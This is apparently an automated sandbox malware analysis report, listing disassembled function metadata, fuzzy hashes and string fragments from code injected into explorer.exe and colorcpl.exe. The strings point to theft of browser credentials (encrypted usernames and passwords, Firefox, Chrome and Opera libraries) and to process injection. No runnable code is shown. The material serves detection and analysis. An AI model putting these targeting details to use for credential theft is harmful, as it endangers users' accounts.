Instruction Fuzzy Hash: 63E15874628F488FCBA4DF78C4857AAB7E0FB58301F504A2EA59BC7245DF30A545CB89

Function 10A55792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

form, xrefs: 10A5584D
encr, xrefs: 10A558D2
Subm, xrefs: 10A55855
guid, xrefs: 10A557CE
swor, xrefs: 10A558EA
ypte, xrefs: 10A558DA
d, xrefs: 10A558F2
encr, xrefs: 10A5589D
itUR, xrefs: 10A5585D
dUse, xrefs: 10A558AD
rnam, xrefs: 10A558B5
ypte, xrefs: 10A558A5
e, xrefs: 10A558BD
user, xrefs: 10A55876
dPas, xrefs: 10A558E2
Fiel, xrefs: 10A55884
name, xrefs: 10A5587D

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: f2bf8797aba256c0ffb2dfdbc999ab839e6dc69564d4d241c2199b5cea8186b7
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 48B17D30518B488EDB65EF68C486AEEB7F1FF58300F50451EE49AC7251EF70A50ACB86

Function 10A53622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

2, xrefs: 10A53674
i, xrefs: 10A5369E
u, xrefs: 10A53661
t, xrefs: 10A536C8
w, xrefs: 10A536B3
n, xrefs: 10A536C1
n, xrefs: 10A536BA
p, xrefs: 10A53690
c, xrefs: 10A53697
l, xrefs: 10A53682
d, xrefs: 10A536A5
e, xrefs: 10A5366D
s, xrefs: 10A53689
d, xrefs: 10A5367B
l, xrefs: 10A536D6
d, xrefs: 10A536CF
l, xrefs: 10A536AC

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 92e18351adf8fe94776b94206aa323bd8d974c77d44fe0fccef841777d4ddbe6
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: E841D5B1A18B088FDF14DF88A4467BDBBE2FB88700F00425EE409D7245DB75AD498BD6

Function 10A5AAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

b, xrefs: 10A5AC73
[, xrefs: 10A5ACCD
n, xrefs: 10A5AC98
[, xrefs: 10A5AC90
], xrefs: 10A5AC3D
l, xrefs: 10A5ACE2
[, xrefs: 10A5ABF6
D, xrefs: 10A5ACDA
[, xrefs: 10A5AC2D
], xrefs: 10A5ACA8
[, xrefs: 10A5AC66
e, xrefs: 10A5ACA0
c, xrefs: 10A5AC0B
l, xrefs: 10A5AC35

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 65b90b87aeee87b189ef23c45b16667e3f3ae755485e5dcaa18d6967158e96b1
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: C0C15A75228B098FC758EF24C496AEAF3E1FB94304F40472EA59AC7210DF70A559CBC6

Function 10A5AF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

0, xrefs: 10A5AF5B
c, xrefs: 10A5AFC8
r, xrefs: 10A5AFA0
r, xrefs: 10A5AF90
r, xrefs: 10A5AFB8
., xrefs: 10A5AF63
r, xrefs: 10A5AF88
r, xrefs: 10A5AF98
r, xrefs: 10A5AFB0
r, xrefs: 10A5AFA8
n, xrefs: 10A5AF6B
r, xrefs: 10A5AFC0

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: a3062f458bccfd7eb262830d87413745ee47caa11487b437702facfd94cad77f
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: AB51C5315287488FD749CF18D4812AAB7E5FB85700F501A2EF8CBC7241DBB4A90ACF82

Function 10A542F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dragon_s.dll, xrefs: 10A54614
dll, xrefs: 10A5432E
cli., xrefs: 10A54327
opera_browser.dll, xrefs: 10A54629
4.dl, xrefs: 10A544DB
nspr, xrefs: 10A544D4
l, xrefs: 10A544E2
sspi, xrefs: 10A54320

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 8dd516276b70ce7517be4bbbee236440aa182d9ab90ce2cbbdf6d967b5b1b657
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 22C18174618A198FC758EF68D496AEAF3E1FB94304F41432DA44AC7255DF30EA0ACBC5

Function 10A542F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dragon_s.dll, xrefs: 10A54614
dll, xrefs: 10A5432E
cli., xrefs: 10A54327
opera_browser.dll, xrefs: 10A54629
4.dl, xrefs: 10A544DB
nspr, xrefs: 10A544D4
l, xrefs: 10A544E2
sspi, xrefs: 10A54320

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 7d01e8c942df266f17ee30f450e22edaac845cabd03f4ff3916ccf601b898ffb
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 85C19174618A198FC758EF68D496AAAF3E1FB94304F41432DA44EC7255DF30EA0ACBC5

Function 10A55CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

2, xrefs: 10A55DE1
L: , xrefs: 10A55D66
Pass, xrefs: 10A55D97
UR, xrefs: 10A55D5F
name, xrefs: 10A55DB2
User, xrefs: 10A55DAB
word, xrefs: 10A55D9E

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: b54a6082352da8e977fb9979440410b679ff092f45e1f71e2cdd95eff4519860
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: A0A1A1706187488FDB29EFA8D4457EEB7E1FF88300F40462DE48AD7291EF70954A8789

Function 10A55CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

2, xrefs: 10A55DE1
L: , xrefs: 10A55D66
Pass, xrefs: 10A55D97
UR, xrefs: 10A55D5F
name, xrefs: 10A55DB2
User, xrefs: 10A55DAB
word, xrefs: 10A55D9E

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: d60e7eb9570d00827b3e33e4f6af19cec0fd4019149144d85de008fcbf057bbb
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 079191706187488FDB28EFA8D445BEEB7E1FF98300F40462DE48AD7291EF70954A8785

Function 10A55352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

e, xrefs: 10A5548E
v, xrefs: 10A554A0
, xrefs: 10A5547C
n, xrefs: 10A553E7
., xrefs: 10A553B0

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 03df8d6171f3129bd20cb01499e670382bcdb7d2575a1a8c1bbab9dc675d7c36
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: E37193356187498FD758DFA8C4857AAB7F1FF58304F00062EE48AC7261EB71E94ACB85

Function 10A50C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

l32., xrefs: 10A50C97
dll, xrefs: 10A50C9E
shel, xrefs: 10A50C90
2.dl, xrefs: 10A50C64
ole3, xrefs: 10A50C5D

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: c14e1394bd2b49991996d287ea0c354ede26ea2248b75fd89e640a0cf052c122
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 2F513BB0918B4C8FDB54DFA4C045AEEB7F1FF58301F404A2EA59AE7214EF70A5458B89

Function 10A5186F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 10A518F4
ion., xrefs: 10A518EC
vers, xrefs: 10A518E4
\, xrefs: 10A519E0
4, xrefs: 10A519E9

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: f8b9c05c8848721748b32db4adf50fb00bab41bf4e36a643cc6fe030ad7687c4
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 76419534219B4C8FCBA5EF2498457EAB3E4FB98341F41462E994EC7244EF30E50987C2

Function 10A534B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

32.d, xrefs: 10A534DA
sspi, xrefs: 10A5350E
dll, xrefs: 10A5351C
cli., xrefs: 10A53515
user, xrefs: 10A534D3

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 61a057ddf68a369312282a3007c14082e69badc43c94902cab0508ac5fe9842d
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: CE418071A18E0D8FCB94EF68C0957AD77E1FBA8300F41556AE80ED7200EA31D948CBC2

Function 10A51432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 10A5152A
el32, xrefs: 10A51537
h, xrefs: 10A5151F
.dll, xrefs: 10A5153F

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 830d3b7918d30b0382510bae103513daa3126c4463272aca688e54b9c38801a9
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: C0418F70608B4D8FD7A9DF2980853AAB7E1FB98340F104B2E949FC3255DB70D949CB81

Function 10A580B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

Snif, xrefs: 10A58154
f fr, xrefs: 10A5813D
om:, xrefs: 10A58146
, xrefs: 10A58184

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: eb5faa0f9edaaee11c9179ee397d390483cdcf0fc65b2d205eb661891d89a660
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 4C31E27551CB886FD72ADB28C4856DABBD0FB94300F50492EE49BD7291EE30A54ECB43

Function 10A580C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

Snif, xrefs: 10A58154
f fr, xrefs: 10A5813D
om:, xrefs: 10A58146
, xrefs: 10A58184

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 48207915deb3e9c539bcc5967305b3fdb383a89f332c8d42b8f1468d94e17c0e
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 3531F275508B486FD729DB28C485AEAB7D4FB94300F40492EE49BD3255EE30E54ACB43

Function 10A53FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

chro, xrefs: 10A54023
.dll, xrefs: 10A53FFE
me_c, xrefs: 10A53FEE
hild, xrefs: 10A53FF6

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 9183279bef6d9996c5ab50e41994f86b6caf8f421d956b931070cefcac335ae6
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 41318034218B088FC784EF289495BAAB7E1FFD8300F90462DA84ECB255DF30D909C792

Function 10A53FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

chro, xrefs: 10A54023
.dll, xrefs: 10A53FFE
me_c, xrefs: 10A53FEE
hild, xrefs: 10A53FF6

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: eb4ac32ac77a21d9c5566e62d71abc7bcfbe12cf2c0f297ff0e5b5c6ac96ea0d
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 57318274218B088FC794EF689495BAAB7E1FFD8300F94463DA44ACB255DF30D909C792

Function 10A568C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 10A56935, 10A56948
urlmon.dll, xrefs: 10A56959
nt: , xrefs: 10A5691E
on.d, xrefs: 10A56902

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 03862425f62a150e78f4239a2bee8a566ca95089d6157ef7fa989e44c3eccb0c
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 7A31DF31614A0C8FCB44EFA8C8857EEBBE0FB58204F40422AE44ED7240DF789649C789

Function 10A568BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 10A56935, 10A56948
urlmon.dll, xrefs: 10A56959
nt: , xrefs: 10A5691E
on.d, xrefs: 10A56902

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 784bc9ca07e71242fb71336c006e261b7555cbefc4ffed49ac3ca2b386b1dcd3
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 2D21D071A14A4C8FCB04EFA8C8857EDBBE0FF58204F40422AE45AD7254DF749649CB89

Function 10A57E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 10A57F03
t, xrefs: 10A57EF4
l, xrefs: 10A57F26
., xrefs: 10A57F1F

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 5141f4a8e046d3d070af08bc4b0e18361d1b789be7aa56ee607ed50cd4d6682c
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 09215C74A24A0D9BDB54EFA8D0457EDBBF1FB58304F50462DE009D3600DB74A556CBC4

Function 10A57E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 10A57F03
t, xrefs: 10A57EF4
l, xrefs: 10A57F26
., xrefs: 10A57F1F

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 43fa61f881eec12d05adb5ac9c82c79119bc302bb2d5f9f5386186404c0b17da
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 66215C74A24A0D9FDB54EFA8D0457ADBAF1FB58304F50462EE009D3610DB74A595CB84

Function 10A57FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

logi, xrefs: 10A5803C
user, xrefs: 10A58015
auth, xrefs: 10A5802F
pass, xrefs: 10A58022

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 54a8150afe85072b35d89e174e9352ba8cd01484cf8f0d2d569f6372c20322d3
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 2721CD30614B0D8BCB45EF9998916DEB7F1FF88344F004619E40AEB244D7B0E91A8BC2

Analysis Process: colorcpl.exePID: 2820, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	6.8%
Signature Coverage:	0%
Total number of Nodes:	622
Total number of Limit Nodes:	81

Executed Functions

Function 050CA036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 050CA19F

Strings

0, xrefs: 050CA227

Memory Dump Source

Source File: 00000007.00000002.3357699325.00000000050C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50c0000_colorcpl.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction ID: 0b64af8871edaafdd570c502ed209f543278314280699eb678b4a287dbf6d29d
Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction Fuzzy Hash: BBF11270A18A8C8FDBA5EF68D894AEE7BE0FB99304F40466ED44ED7250DF349541CB41

Function 050C9BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 050C9C93
NtMapViewOfSection.NTDLL ref: 050C9CFF
NtClose.NTDLL ref: 050C9DC5

Strings

@, xrefs: 050C9D0C
@, xrefs: 050C9C8B

Memory Dump Source

Source File: 00000007.00000002.3357699325.00000000050C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50c0000_colorcpl.jbxd

Similarity

API ID: Section$CloseCreateView
String ID: @$@
API String ID: 1133238012-149943524
Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
Instruction ID: f43e69dd06910de4bc025038d7618cc56fd134b79e9b01d8ea963a489e118c7b
Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
Instruction Fuzzy Hash: 8361617061CB488FCB58DF58D8856AEBBE0FB98314F50062EE58AD3651DF35E441CB86

Function 050C9BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 050C9C93
NtMapViewOfSection.NTDLL ref: 050C9CFF

Strings

@, xrefs: 050C9D0C
@, xrefs: 050C9C8B

Memory Dump Source

Source File: 00000007.00000002.3357699325.00000000050C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50c0000_colorcpl.jbxd

Similarity

API ID: Section$CreateView
String ID: @$@
API String ID: 1585966358-149943524
Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
Instruction ID: 136e9415ed9f627e6ceef2dc2288c8e37a86845c36345e63b1ac3f86f5eeea50
Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
Instruction Fuzzy Hash: 30515F70618B088FD758DF18D895AAEBBE0FB98314F50062EE98AD3651DF35E441CB86

Function 050CA042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 050CA19F

Strings

0, xrefs: 050CA0CD

Memory Dump Source

Source File: 00000007.00000002.3357699325.00000000050C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50c0000_colorcpl.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction ID: 8d26d4cc97f801bbb8eae2ce50e2d596d9040c4bcdaf900b847e7e8f33be1ac2
Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction Fuzzy Hash: 1A512C70918A8C8FDBA9EF68D8946EEBBF4FB99304F40462ED44AD7210DF309645CB41

Function 0329A35A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03294BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03294BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0329A3AD

Strings

.z`, xrefs: 0329A39D, 0329A3A8

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 7c417f45352538f3dbc70b9006c8c35baf7fa9f0c61c4a99e0ec42fa983afd1d
Instruction ID: a06930695196af70a22799ac78e96dd46d052a6e6b2878679212f5560dbfe6b4
Opcode Fuzzy Hash: 7c417f45352538f3dbc70b9006c8c35baf7fa9f0c61c4a99e0ec42fa983afd1d
Instruction Fuzzy Hash: 6A01EFB2201208AFCB48CF88CC80EEB37E9AF8C754F158609FA0DD7240D630E8418BA0

Function 0329A360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

